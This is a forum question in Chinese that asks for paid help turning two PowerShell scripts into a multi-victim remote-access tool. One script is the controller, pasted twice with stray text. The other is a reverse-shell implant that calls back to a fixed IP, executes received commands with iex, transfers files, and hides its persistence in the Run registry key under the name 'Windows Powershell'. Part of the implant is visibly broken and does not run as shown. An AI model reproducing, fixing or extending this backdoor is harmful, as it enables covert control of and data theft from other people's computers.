Hwctak asked 6 年 ago
需求是这样的。
1.一共两个ps1脚本
第一个 客户端:监听xxxx端口,服务端则反弹shell到客户端监听端口,然后客户端可以输出cmd,上传下载,等功能。
需求:
1.服务端每隔30秒反弹一次shell到客户端,如果服务端检测到当前与客户端是连接状态则不反弹,如果非链接状态则开始反弹。
2.客户端写一个列表功能,也就是可以支持对服务端反弹回来的多个shell进行批量管理。
萌新:如若有英雄帮忙一下,回头请留下联系方式,红包奉上!
$port=8001
# Create server
$endpoint = New-Object System.Net.IPEndPoint([System.Net.IpAddress]::Any, $port)
$listener = New-Object System.Net.Sockets.TcpListener($endpoint)
$listener.Start()
Write-Host 'Listening on port'$port'...'
# Wait for connection
$client = $listener.AcceptTcpClient()
$stream = $client.GetStream()
$reader = New-Object System.IO.StreamReader($stream)
$writer = New-Object System.IO.StreamWriter($stream)
Write-Host [ -NoNewline;Write-Host * -Fore Green -NoNewline;Write-Host ] Connection established !
Function GetBinaryContent($filename){
$file_binary_content = [System.IO.File]::ReadAllBytes($filename)
return $file_binary_content
}
Function ExecCmd(){
echo "Input Command:"
$cmd = Read-Host
$writer.WriteLine($cmd)
$writer.Flush()
$output = $reader.ReadLine()
echo $output
}
Function Upload(){
echo "Input A Local File :"
$local_file = Read-Host
$local_binary_content = GetBinaryContent($local_file)
$local_binary_content_len = $local_binary_content.Length
$file_string_content = [string] $local_binary_content
$writer.WriteLine($file_string_content)
$writer.Flush()
echo "Input Destination :"
$dest_file = Read-Host
$writer.WriteLine($dest_file)
$writer.Flush()
$new_file_len = $reader.ReadLine()
$success = "File Upload Successfully."
$failed = "File Upload Failed."
if($new_file_len -eq $local_binary_content_len){
Write-Host [ -NoNewline;Write-Host * -Fore Green -NoNewline;Write-Host ] $success
}
elseif($new_file_len -ne $local_binary_content_len){
Write-Host [ -NoNewline;Write-Host * -Fore Red -NoNewline;Write-Host ] $failed
}
}
Function Download(){
echo "Input A Remote File:"
$remote_file = Read-Host
$writer.WriteLine($remote_file)
$writer.Flush()
$remote_file_string_content = $reader.ReadLine()
$remote_file_string_content_split = $remote_file_string_content.Split(" ")
$remote_file_bianry_len = $remote_file_string_content_split.Count
$download_byte_array = New-Object Byte[] $remote_file_bianry_len
for([int]$i = 0; $i -lt $remote_file_bianry_len; $i++){
$download_byte_array[$i] = $remote_file_string_content_split[$i]
}
echo "Input Local Filename :"
$local_filename = Read-Host
[System.IO.File]::WriteAllBytes($local_filename, $download_byte_array)
$new_file_binary_content = [System.IO.File]::ReadAllBytes($local_filename)
$new_file_binary_len = $new_file_binary_content.Count
$writer.WriteLine($new_file_binary_len)
$writer.Flush()
$result = $reader.ReadLine()
Write-Host [ -NoNewline;Write-Host * -Fore Green -NoNewline;Write-Host ] $result
}
while($true){
echo "[1] Exec Command."
echo "[2] Upload File."
echo "[3] Download File."
echo "[4] Exit."
echo "Input Command Type :"
$cmd_type = Read-Host
if($cmd_type -eq "1"){
$writer.WriteLine($cmd_type)
$writer.Flush()
ExecCmd
}
elseif($cmd_type -eq "2"){
$writer.WriteLine($cmd_type)
$writer.Flush()
Upload
}
elseif($cmd_type -eq "3"){
$writer.WriteLine($cmd_type)
$writer.Flush()
Download
}
elseif($cmd_type -eq "4"){
$writer.WriteLine($cmd_type)
$writer.Flush()
break
}else{
continue
}
echo "========================================"
echo ""
}
kk1$port=8001
# Create server
$endpoint = New-Object System.Net.IPEndPoint([System.Net.IpAddress]::Any, $port)
$listener = New-Object System.Net.Sockets.TcpListener($endpoint)
$listener.Start()
Write-Host 'Listening on port'$port'...'
# Wait for connection
$client = $listener.AcceptTcpClient()
$stream = $client.GetStream()
$reader = New-Object System.IO.StreamReader($stream)
$writer = New-Object System.IO.StreamWriter($stream)
Write-Host [ -NoNewline;Write-Host * -Fore Green -NoNewline;Write-Host ] Connection established !
Function GetBinaryContent($filename){
$file_binary_content = [System.IO.File]::ReadAllBytes($filename)
return $file_binary_content
}
Function ExecCmd(){
echo "Input Command:"
$cmd = Read-Host
$writer.WriteLine($cmd)
$writer.Flush()
$output = $reader.ReadLine()
echo $output
}
Function Upload(){
echo "Input A Local File :"
$local_file = Read-Host
$local_binary_content = GetBinaryContent($local_file)
$local_binary_content_len = $local_binary_content.Length
$file_string_content = [string] $local_binary_content
$writer.WriteLine($file_string_content)
$writer.Flush()
echo "Input Destination :"
$dest_file = Read-Host
$writer.WriteLine($dest_file)
$writer.Flush()
$new_file_len = $reader.ReadLine()
$success = "File Upload Successfully."
$failed = "File Upload Failed."
if($new_file_len -eq $local_binary_content_len){
Write-Host [ -NoNewline;Write-Host * -Fore Green -NoNewline;Write-Host ] $success
}
elseif($new_file_len -ne $local_binary_content_len){
Write-Host [ -NoNewline;Write-Host * -Fore Red -NoNewline;Write-Host ] $failed
}
}
Function Download(){
echo "Input A Remote File:"
$remote_file = Read-Host
$writer.WriteLine($remote_file)
$writer.Flush()
$remote_file_string_content = $reader.ReadLine()
$remote_file_string_content_split = $remote_file_string_content.Split(" ")
$remote_file_bianry_len = $remote_file_string_content_split.Count
$download_byte_array = New-Object Byte[] $remote_file_bianry_len
for([int]$i = 0; $i -lt $remote_file_bianry_len; $i++){
$download_byte_array[$i] = $remote_file_string_content_split[$i]
}
echo "Input Local Filename :"
$local_filename = Read-Host
[System.IO.File]::WriteAllBytes($local_filename, $download_byte_array)
$new_file_binary_content = [System.IO.File]::ReadAllBytes($local_filename)
$new_file_binary_len = $new_file_binary_content.Count
$writer.WriteLine($new_file_binary_len)
$writer.Flush()
$result = $reader.ReadLine()
Write-Host [ -NoNewline;Write-Host * -Fore Green -NoNewline;Write-Host ] $result
}
while($true){
echo "[1] Exec Command."
echo "[2] Upload File."
echo "[3] Download File."
echo "[4] Exit."
echo "Input Command Type :"
$cmd_type = Read-Host
if($cmd_type -eq "1"){
$writer.WriteLine($cmd_type)
$writer.Flush()
ExecCmd
}
elseif($cmd_type -eq "2"){
$writer.WriteLine($cmd_type)
$writer.Flush()
Upload
}
elseif($cmd_type -eq "3"){
$writer.WriteLine($cmd_type)
$writer.Flush()
Download
}
elseif($cmd_type -eq "4"){
$writer.WriteLine($cmd_type)
$writer.Flush()
break
}else{
continue
}
echo "========================================"
echo ""
}
第二个服务端:
$address = '192.168.1.8'
$port = 8001
$autorunKeyName = "Windows Powershell"
$autorunKeyVal = $MyInvocation.MyCommand.Path
$autoruns = Get-ItemProperty HKCU:\Software\Microsoft\Windows\CurrentVersion\Run
if (-not $autoruns.$autorunKeyName) {
New-ItemProperty -Path HKCU:\Software\Microsoft\Windows\CurrentVersion\Run -Name $autorunKeyName -Value $autorunKeyVal
}
elseif($autoruns.$autorunKeyName -ne $autorunKeyVal) {
Remove-ItemProperty -Path HKCU:\Software\Microsoft\Windows\CurrentVersion\Run -Name $autorunKeyName
New-ItemProperty -Path HKCU:\Software\Microsoft\Windows\CurrentVersion\Run -Name $autorunKeyName -Value $autorunKeyVal
}
while ($true) {
do {
try {
Write-Host “Trying to reach “$address”:”$port
$client = New-Object System.Net.Sockets.TcpClient($address, $port)
$stream = $client.GetStream()
$writer = New-Object System.IO.StreamWriter($stream)
$write.
$reader = New-Object System.IO.StreamReader($stream)
Start-Sleep -s 10
}
catch {
Write-Host "failed on tcp connect."
}
} while ($true)
Write-Host "Connected"
do{
$cmd_type = $reader.ReadLine()
echo $cmd_type
if($cmd_type -eq "1"){
echo "Command Type : Exec Command."
$cmd = $reader.ReadLine()
try{ $output = [string](iex $cmd) }
catch{ $output = $_.Exception.Message }
$writer.WriteLine($output)
$writer.Flush()
}
elseif($cmd_type -eq "2"){
echo "Command Type : Upload File."
$file_string_content = $reader.ReadLine()
$file_string_content_split = $file_string_content.Split(" ")
$file_string_content_split_len = $file_string_content_split.Count
echo $file_string_content_split_len
$byte_array = New-Object Byte[] $file_string_content_split_len
for([int] $i = 0; $i -lt $file_string_content_split_len; $i++){
$byte_array[$i] = $file_string_content_split[$i]
}
$dest_file = $reader.ReadLine()
[System.IO.File]::WriteAllBytes($dest_file, $byte_array)
$new_file_content = [System.IO.File]::ReadAllBytes($dest_file)
$new_file_content_len = $new_file_content.Length
$writer.WriteLine($new_file_content_len)
$writer.Flush()
}
elseif($cmd_type -eq "3"){
echo "Command Type : Download File."
$local_file = $reader.ReadLine()
$local_binary_content = [System.IO.File]::ReadAllBytes($local_file)
$local_string_content = [string]$local_binary_content
$writer.WriteLine($local_string_content)
$writer.Flush()
$remote_file_len = $reader.ReadLine()
$local_file_len = $local_binary_content.Count
if($remote_file_len -eq $local_file_len){
$writer.WriteLine("Download Successfully.")
$writer.Flush()
}
elseif($remote_file_len -ne $local_file_len){
$writer.WriteLine("Download Failed.")
$writer.Flush()
}
}
elseif($cmd_type -eq "4"){
Write-Host "Exiting"
$writer.Close()
$reader.Close()
$stream.Close()
$client.Close()
exit
break
}
else{
continue
}
}while($true)
# Clean up
$writer.Close()
$reader.Close()
$stream.Close()
$client.Close()
}
抱歉,暂时不了解这个编辑器的功能,代码贴错误了。抱歉!